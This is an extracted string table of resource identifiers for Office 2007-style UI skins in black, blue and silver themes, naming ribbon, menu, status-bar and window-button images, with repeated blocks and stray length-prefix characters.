_CATEGORY_TAB'BLACK_IDB_OFFICE2007_RIBBON_KEYTIP_BACK(BLACK_IDB_OFFICE2007_RIBBON_PANEL_BACK_B(BLACK_IDB_OFFICE2007_RIBBON_PANEL_BACK_T&BLACK_IDB_OFFICE2007_RIBBON_PANEL_MAIN-BLACK_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER%BLACK_IDB_OFFICE2007_RIBBON_PANEL_QAT BLACK_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR)BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_BACK-BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL/BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT,BLACK_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS BLACK_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS(BLACK_IDB_OFFICE2007_RIBBON_SLIDER_THUMB#BLACK_IDB_OFFICE2007_STATUSBAR_BACK'BLACK_IDB_OFFICE2007_STATUSBAR_BACK_EXT)BLACK_IDB_OFFICE2007_STATUSBAR_PANEBORDER&BLACK_IDB_OFFICE2007_STATUSBAR_SIZEBOX!BLACK_IDB_OFFICE2007_SYS_BTN_BACK#BLACK_IDB_OFFICE2007_SYS_BTN_BACK_S"BLACK_IDB_OFFICE2007_SYS_BTN_CLOSE$BLACK_IDB_OFFICE2007_SYS_BTN_CLOSE_S%BLACK_IDB_OFFICE2007_SYS_BTN_MAXIMIZE'BLACK_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S%BLACK_IDB_OFFICE2007_SYS_BTN_MINIMIZE'BLACK_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S$BLACK_IDB_OFFICE2007_SYS_BTN_RESTORE&BLACK_IDB_OFFICE2007_SYS_BTN_RESTORE_S
BLUE_IDB_OFFICE2007_MENU_BTN%BLUE_IDB_OFFICE2007_MENU_BTN_DISABLED%BLUE_IDB_OFFICE2007_MENU_BTN_SCROLL_T BLUE_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR"BLUE_IDB_OFFICE2007_MENU_ITEM_BACK&BLUE_IDB_OFFICE2007_MENU_ITEM_MARKER_C&BLUE_IDB_OFFICE2007_MENU_ITEM_MARKER_R$BLUE_IDB_OFFICE2007_OUTLOOK_BAR_BACK$BLUE_IDB_OFFICE2007_OUTLOOK_BTN_PAGE$BLUE_IDB_OFFICE2007_POPUPMENU_BORDER'BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR/BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV0BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT.BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V(BLUE_IDB_OFFICE2007_RIBBON_BORDER_FLOATY%BLUE_IDB_OFFICE2007_RIBBON_BORDER_QAT$BLUE_IDB_OFFICE2007_RIBBON_BTN_CHECK&BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON,BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE*BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT/BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_F&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_L&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_M&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_S%BLUE_IDB_OFFICE2007_RIBBON_BTN_LAUNCH*BLUE_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON#BLUE_IDB_OFFICE2007_RIBBON_BTN_MAIN'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M'BLUE_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B'BLUE_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S%BLUE_IDB_OFFICE2007_RIBBON_BTN_PAGE_L%BLUE_IDB_OFFICE2007_RIBBON_BTN_PAGE_R(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T)BLUE_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN*BLUE_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE%BLUE_IDB_OFFICE2007_RIBBON_CAPTION_QA BLUE_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS(BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_BACK'BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_TAB BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB/BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B/BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB,BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB&BLUE_IDB_OFFICE2007_RIBBON_KEYTIP_BACK'BLUE_IDB_OFFICE2007_RIBBON_PANEL_BACK_B'BLUE_IDB_OFFICE2007_RIBBON_PANEL_BACK_T%BLUE_IDB_OFFICE2007_RIBBON_PANEL_MAIN,BLUE_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER$BLUE_IDB_OFFICE2007_RIBBON_PANEL_QAT*BLUE_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR(BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_BACK,BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY*BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL.BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT BLUE_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS*BLUE_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS'BLUE_IDB_OFFICE2007_RIBBON_SLIDER_THUMB"BLUE_IDB_OFFICE2007_STATUSBAR_BACK&BLUE_IDB_OFFICE2007_STATUSBAR_BACK_EXT(BLUE_IDB_OFFICE2007_STATUSBAR_PANEBORDER%BLUE_IDB_OFFICE2007_STATUSBAR_SIZEBOX BLUE_IDB_OFFICE2007_SYS_BTN_BACK"BLUE_IDB_OFFICE2007_SYS_BTN_BACK_S!BLUE_IDB_OFFICE2007_SYS_BTN_CLOSE#BLUE_IDB_OFFICE2007_SYS_BTN_CLOSE_S$BLUE_IDB_OFFICE2007_SYS_BTN_MAXIMIZE&BLUE_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S$BLUE_IDB_OFFICE2007_SYS_BTN_MINIMIZE&BLUE_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S#BLUE_IDB_OFFICE2007_SYS_BTN_RESTORE%BLUE_IDB_OFFICE2007_SYS_BTN_RESTORE_S
BLUE_IDB_OFFICE2007_MENU_BTN%BLUE_IDB_OFFICE2007_MENU_BTN_DISABLED%BLUE_IDB_OFFICE2007_MENU_BTN_SCROLL_T BLUE_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR"BLUE_IDB_OFFICE2007_MENU_ITEM_BACK&BLUE_IDB_OFFICE2007_MENU_ITEM_MARKER_C&BLUE_IDB_OFFICE2007_MENU_ITEM_MARKER_R$BLUE_IDB_OFFICE2007_OUTLOOK_BAR_BACK$BLUE_IDB_OFFICE2007_OUTLOOK_BTN_PAGE$BLUE_IDB_OFFICE2007_POPUPMENU_BORDER'BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR/BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV0BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT.BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V(BLUE_IDB_OFFICE2007_RIBBON_BORDER_FLOATY%BLUE_IDB_OFFICE2007_RIBBON_BORDER_QAT$BLUE_IDB_OFFICE2007_RIBBON_BTN_CHECK&BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON,BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE*BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT/BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_F&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_L&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_M&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_S%BLUE_IDB_OFFICE2007_RIBBON_BTN_LAUNCH*BLUE_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON#BLUE_IDB_OFFICE2007_RIBBON_BTN_MAIN'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M'BLUE_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B'BLUE_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S%BLUE_IDB_OFFICE2007_RIBBON_BTN_PAGE_L%BLUE_IDB_OFFICE2007_RIBBON_BTN_PAGE_R(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T)BLUE_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN*BLUE_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE%BLUE_IDB_OFFICE2007_RIBBON_CAPTION_QA BLUE_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS(BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_BACK'BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_TAB BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB/BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B/BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB,BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB&BLUE_IDB_OFFICE2007_RIBBON_KEYTIP_BACK'BLUE_IDB_OFFICE2007_RIBBON_PANEL_BACK_B'BLUE_IDB_OFFICE2007_RIBBON_PANEL_BACK_T%BLUE_IDB_OFFICE2007_RIBBON_PANEL_MAIN,BLUE_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER$BLUE_IDB_OFFICE2007_RIBBON_PANEL_QAT*BLUE_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR(BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_BACK,BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY*BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL.BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT BLUE_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS*BLUE_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS'BLUE_IDB_OFFICE2007_RIBBON_SLIDER_THUMB"BLUE_IDB_OFFICE2007_STATUSBAR_BACK&BLUE_IDB_OFFICE2007_STATUSBAR_BACK_EXT(BLUE_IDB_OFFICE2007_STATUSBAR_PANEBORDER%BLUE_IDB_OFFICE2007_STATUSBAR_SIZEBOX BLUE_IDB_OFFICE2007_SYS_BTN_BACK"BLUE_IDB_OFFICE2007_SYS_BTN_BACK_S!BLUE_IDB_OFFICE2007_SYS_BTN_CLOSE#BLUE_IDB_OFFICE2007_SYS_BTN_CLOSE_S$BLUE_IDB_OFFICE2007_SYS_BTN_MAXIMIZE&BLUE_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S$BLUE_IDB_OFFICE2007_SYS_BTN_MINIMIZE&BLUE_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S#BLUE_IDB_OFFICE2007_SYS_BTN_RESTORE%BLUE_IDB_OFFICE2007_SYS_BTN_RESTORE_S
SILVER_IDB_OFFICE2007_MENU_BTN'SILVER_IDB_OFFICE2007_MENU_BTN_DISABLED'SILVER_IDB_OFFICE2007_MENU_BTN_SCROLL_T-SILVER_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR$SILVER_IDB_OFFICE2007_MENU_ITEM_BACK(SILVER_IDB_OFFICE2007_MENU_ITEM_MARKER_C(SILVER_IDB_OFFICE2007_MENU_ITEM_MARKER_R&SILVER_IDB_OFFICE2007_OUTLOOK_BAR_BACK&SILVER_IDB_OFFICE2007_OUTLOOK_BTN_PAGE&SILVER_IDB_OFFICE2007_POPUPMENU_BORDER)SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR1SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV2SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT0SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V*SILVER_IDB_OFFICE2007_RIBBON_BORDER_FLOATY'SILVER_IDB_OFFICE2007_RIBBON_BORDER_QAT&SILVER_IDB_OFFICE2007_RIBBON_BTN_CHECK(SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT-SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON.SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE,SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT1SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_F(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_L(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_M(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_S'SILVER_IDB_OFFICE2007_RIBBON_BTN_LAUNCH,SILVER_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON%SILVER_IDB_OFFICE2007_RIBBON_BTN_MAIN)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M)SILVER_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B)SILVER_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S'SILVER_IDB_OFFICE2007_RIBBON_BTN_PAGE_L'SILVER_IDB_OFFICE2007_RIBBON_BTN_PAGE_R*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T SILVER_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN,SILVER_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE'SILVER_IDB_OFFICE2007_RIBBON_CAPTION_QA-SILVER_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS*SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_BACK)SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_TAB-SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB1SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B1SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB.SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB(SILVER_IDB_OFFICE2007_RIBBON_KEYTIP_BACK)SILVER_IDB_OFFICE2007_RIBBON_PANEL_BACK_B)SILVER_IDB_OFFICE2007_RIBBON_PANEL_BACK_T'SILVER_IDB_OFFICE2007_RIBBON_PANEL_MAIN.SILVER_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER&SILVER_IDB_OFFICE2007_RIBBON_PANEL_QAT,SILVER_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR*SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_BACK.SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY,SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL0SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT-SILVER_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS,SILVER_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS)SILVER_IDB_OFFICE2007_RIBBON_SLIDER_THUMB$SILVER_IDB_OFFICE2007_STATUSBAR_BACK(SILVER_IDB_OFFICE2007_STATUSBAR_BACK_EXT*SILVER_IDB_OFFICE2007_STATUSBAR_PANEBORDER'SILVER_IDB_OFFICE2007_STATUSBAR_SIZEBOX"SILVER_IDB_OFFICE2007_SYS_BTN_BACK$SILVER_IDB_OFFICE2007_SYS_BTN_BACK_S#SILVER_IDB_OFFICE2007_SYS_BTN_CLOSE%SILVER_IDB_OFFICE2007_SYS_BTN_CLOSE_S&SILVER_IDB_OFFICE2007_SYS_BTN_MAXIMIZE(SILVER_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S&SILVER_IDB_OFFICE2007_SYS_BTN_MINIMIZE(SILVER_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S%SILVER_IDB_OFFICE2007_SYS_BTN_RESTORE'SILVER_IDB_OFFICE2007_SYS_BTN_RESTORE_S
SILVER_IDB_OFFICE2007_MENU_BTN'SILVER_IDB_OFFICE2007_MENU_BTN_DISABLED'SILVER_IDB_OFFICE2007_MENU_BTN_SCROLL_T-SILVER_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR$SILVER_IDB_OFFICE2007_MENU_ITEM_BACK(SILVER_IDB_OFFICE2007_MENU_ITEM_MARKER_C(SILVER_IDB_OFFICE2007_MENU_ITEM_MARKER_R&SILVER_IDB_OFFICE2007_OUTLOOK_BAR_BACK&SILVER_IDB_OFFICE2007_OUTLOOK_BTN_PAGE&SILVER_IDB_OFFICE2007_POPUPMENU_BORDER)SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR1SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV2SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT0SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V*SILVER_IDB_OFFICE2007_RIBBON_BORDER_FLOATY'SILVER_IDB_OFFICE2007_RIBBON_BORDER_QAT&SILVER_IDB_OFFICE2007_RIBBON_BTN_CHECK(SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT-SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON.SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE,SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT1SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_F(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_L(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_M(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_S'SILVER_IDB_OFFICE2007_RIBBON_BTN_LAUNCH,SILVER_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON%SILVER_IDB_OFFICE2007_RIBBON_BTN_MAIN)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M)SILVER_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B)SILVER_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S'SILVER_IDB_OFFICE2007_RIBBON_BTN_PAGE_L'SILVER_IDB_OFFICE2007_RIBBON_BTN_PAGE_R*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B*SILVER_IDB